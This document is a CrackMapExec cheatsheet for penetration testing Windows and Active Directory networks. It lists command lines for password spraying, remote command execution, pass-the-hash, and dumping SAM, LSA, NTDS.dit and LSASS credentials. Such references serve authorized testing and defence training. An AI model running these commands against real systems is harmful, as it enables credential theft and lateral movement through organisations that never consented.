
CrackMapExec (CME) Cheatsheet

Swiss army knife for pentesting Windows/AD environments.


Basic Syntax

crackmapexec <protocol> <target> [options]

Protocols: smb, ldap, mssql, ssh, winrm, rdp, ftp


Target Specification

Format        Example
Single IP     10.10.10.10
CIDR range    10.10.10.0/24
IP range      10.10.10.1-50
File          targets.txt (one target per line)
Hostname      dc01.domain.local

Authentication Options

Option         Description                                   Example
-u USER        Username, or a file of usernames              -u admin or -u users.txt
-p PASS        Password, or a file of passwords              -p Password123 or -p passwords.txt
-H HASH        NTLM hash, either NT alone or LM:NT           -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (the LM:NT of an empty password; substitute a dumped hash)
-d DOMAIN      Domain                                        -d MYDOMAIN
--local-auth   Authenticate against the local SAM            Local accounts and non-domain-joined machines
-k             Kerberos authentication                       Combine with --use-kcache to use the ticket in KRB5CCNAME

SMB Operations

Check Access

crackmapexec smb 10.10.10.10 -u admin -p Password123

Output indicators:

  • [+] - Valid credentials
  • [-] - Logon failure; the NT status (e.g. STATUS_LOGON_FAILURE, STATUS_ACCOUNT_LOCKED_OUT) is printed after the credential
  • (Pwn3d!) - The account is a local administrator on that host

Enumerate Shares

crackmapexec smb 10.10.10.10 -u admin -p Password123 --shares

List Share Contents

crackmapexec smb 10.10.10.10 -u admin -p Password123 --spider C$ --depth 2

Enumerate Users

crackmapexec smb 10.10.10.10 -u admin -p Password123 --users

Enumerate Groups

crackmapexec smb 10.10.10.10 -u admin -p Password123 --groups

Enumerate Logged-on Users

crackmapexec smb 10.10.10.0/24 -u admin -p Password123 --loggedon-users

Enumerate Sessions

crackmapexec smb 10.10.10.10 -u admin -p Password123 --sessions

Password Spraying

Single Password Against User List

crackmapexec smb 10.10.10.10 -u users.txt -p 'Company01!' --continue-on-success

With Local Auth

crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --local-auth

Command Execution

Option                 Description
-x CMD                 Execute a command via cmd.exe
-X CMD                 Execute a PowerShell command
--exec-method METHOD   Execution method: smbexec, atexec, wmiexec, mmcexec

Execute CMD

crackmapexec smb 10.10.10.10 -u admin -p Password123 -x 'whoami'

Execute PowerShell

crackmapexec smb 10.10.10.10 -u admin -p Password123 -X 'Get-Process'

Specify Execution Method

crackmapexec smb 10.10.10.10 -u admin -p Password123 -x 'ipconfig' --exec-method smbexec

Credential Dumping

Dump SAM

crackmapexec smb 10.10.10.10 -u admin -p Password123 --sam

Dump LSA Secrets

crackmapexec smb 10.10.10.10 -u admin -p Password123 --lsa

Dump NTDS.dit (Domain Controller; needs Domain Admin-level rights. The default method is DRSUAPI replication; --ntds vss uses a volume shadow copy instead)

crackmapexec smb dc01 -u admin -p Password123 --ntds

Dump LSASS

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M lsassy

Pass-the-Hash

crackmapexec smb 10.10.10.10 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

-H accepts either the NT hash alone or LM:NT. The hash above is that of an empty password; substitute the NT hash recovered with --sam, --lsa or --ntds. Add --local-auth when reusing a local account's hash across hosts.

Modules

List available modules:

crackmapexec smb -L

Run a module:

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M <module>

Common modules:

  • lsassy - Dump LSASS
  • mimikatz - Run Mimikatz
  • spider_plus - Spider shares
  • enum_av - Enumerate AV products
  • gpp_password - Find GPP passwords

Database

CME stores results in a database:

cmedb

Database commands:

  • hosts - Show discovered hosts
  • creds - Show captured credentials
  • export - Export data

Useful Flags

Flag                    Description
--continue-on-success   Keep trying the remaining credentials on a host after a valid one is found (spraying)
--no-bruteforce         With both -u and -p pointing at files, pair them line by line (user1:pass1, user2:pass2) instead of trying every combination
-v                      Verbose output
--gen-relay-list FILE   Write the hosts where SMB signing is not required to FILE (relay targets for ntlmrelayx)